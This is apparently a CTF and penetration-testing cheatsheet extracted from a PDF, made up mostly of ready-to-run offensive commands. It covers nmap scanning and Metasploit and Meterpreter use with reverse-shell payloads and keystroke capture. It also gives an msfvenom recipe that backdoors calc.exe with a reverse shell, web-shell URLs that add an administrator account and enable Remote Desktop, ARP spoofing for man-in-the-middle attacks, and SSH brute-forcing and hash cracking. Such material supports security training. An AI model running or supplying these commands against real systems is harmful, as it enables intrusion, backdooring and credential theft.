ASR CTF Cheatsheet PDF
ASR CTF Cheatsheet PDF
Enumeration - smtp-user-enum
Vulnerability Scan
Nessus
NIKTO - web scanning
ZAP Proxy
Exploits
Metasploit
Meterpreter
Add Trojan
Microsoft Commands
Upload file to Microsoft Windows
Using SMB share
Using meterpreter
Web Vulnerabilities
SQL Injection
Add script through SQL Injection
Network Attacks
ARP spoofing
MitM
HTTPS method 1 - DNS spoofing
HTTPs method 2 - SSL Stripping
Password Attack
Medusa (remote)
John the Ripper
Complex passwords generator
Unshadowing (local)
Crack LM/NTML hashes (local)
Crack LM
Crack NTLM
Hydra (remote)
Online rainbowtables
NMAP
ARP based
nmap -sn
ICMP based
nmap -sn
UDP Ping
nmap -PU
Others
https://nmap.org/book/man-host-discovery.html
NMAP Port Scanning
ACK Scan
nmap -sA
UDP Scan
if ICM Host Unreachable - port closed
else not sure!
nmap -sU
Others
https://nmap.org/book/man-port-scanning-techniques.html
NMAP options
Specify target
192.168.1-254.1-254
IP/16
nmap -iL iplist.txt
Specify ports
-p21,22
-p1-65535
Output redirection
nmap -oN output.txt 192.168.1.1
Scanning speed
-T<0-5> implicit 3
No DNS resolution
-n
OS detection
-O
Scripts
ls /usr/share/nmap/scripts
nmap --script <script>
nmap --script discovery <IP>
nmap --script http* <IP>
Enumeration - smtp-user-enum
https://github.com/pentestmonkey/smtp-user-enum/blob/master/smtp-user-enum-user-docs.
pdf
smtp-user-enum -M [method: VRFY, EXPN, RCPT TO] -U [UserList] -t [target]
Vulnerability Scan
Nessus
Download: http://www.tenable.com/products/nessus/select-your-operating-system#tos
Verify: netstat -tlnp | grep 8834
service nessusd restart
To Disable Categories: In Policy, Plugins Tab, Disable brute force and Denial of Service
Exploits
Metasploit
msfconsole
> search <vulnerability code> ex: ms08-067
> use <path returned by search>
> info --------------> list what is already configured ex: RHOST
> show options
> show payloads -----> list of payloads that can be exploited
> set RHOST <IP target>
> set LHOST <local IP>
> set PAYLOAD <chosen payload> ex: windows/shell/reverse_tcp
> exploit
Meterpreter
> set PAYLOAD <meterpreter payload> ex: windows/meterpreter/reverse_tcp
> exploit
> download C:\\WINDOWS\\system32\\calc.exe /root/
> keyscan start
> keyscan dump
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
Add Trojan
ex:
msfvenom -p windows/shell/reverse_tcp LHOST=172.16.150.129 -a x86 --platform Windows
-e x86/shikata_ga_nai -i 3 -x /root/calc.exe -o calc_backdoor.exe
Using meterpreter
meterpreter> upload calc_backdoor.exe C://WINDOWS//system32
Web Vulnerabilities
SQL Injection
Discover the vulnerabilities with ZapProxy
http://pentestmonkey.net/category/cheat-sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
http://www.101hacker.com/2010/12/sql-injection-tutorial.html
http://172.16.150.130/c.php?cmd=hostname
http://172.16.150.130/c.php?cmd=net user <user> <password> /add
http://172.16.150.130/c.php?cmd=net localgroup Administrators <user> /add ---> add user to
the Administrator group
http://172.16.150.130/c.php?cmd=reg add
"HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t
REG_DWORD /d 0 /f
Network Attacks
ARP spoofing
MitM
IP Forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 172.16.150.130 172.16.150.2 ← IPtarget IPgateway
--close---
Password Attack
https://github.com/danielmiessler/SecLists/tree/master/Passwords
https://github.com/danielmiessler/SecLists/blob/master/Passwords/500-worst-passwords.txt
Medusa (remote)
medusa -h 172.16.150.132 -u dexter -P 500-worst-passwords.txt -M ssh
http://foofus.net/goons/jmk/medusa/medusa.html
Unshadowing (local)
unshadow passwd shadow > unshadow.txt
john unshadow.txt
Crack LM
john --format=LM windump.txt
john --show windump.txt
Crack NTLM
john --show windump.txt | cut -d: -f2 > pwd_LM.txt
john --wordlist=pwd_LM.txt --rules=NT --format=NT hashes.txt
john --show --rules=NT --format=NT windump.txt
Hydra (remote)
hydra -l dexter -P newdictionary.txt ssh://172.16.150.132
Online rainbowtables
http://rainbowtables.it64.com/
https://crackstation.net/
https://www.objectif-securite.ch/en/ophcrack.php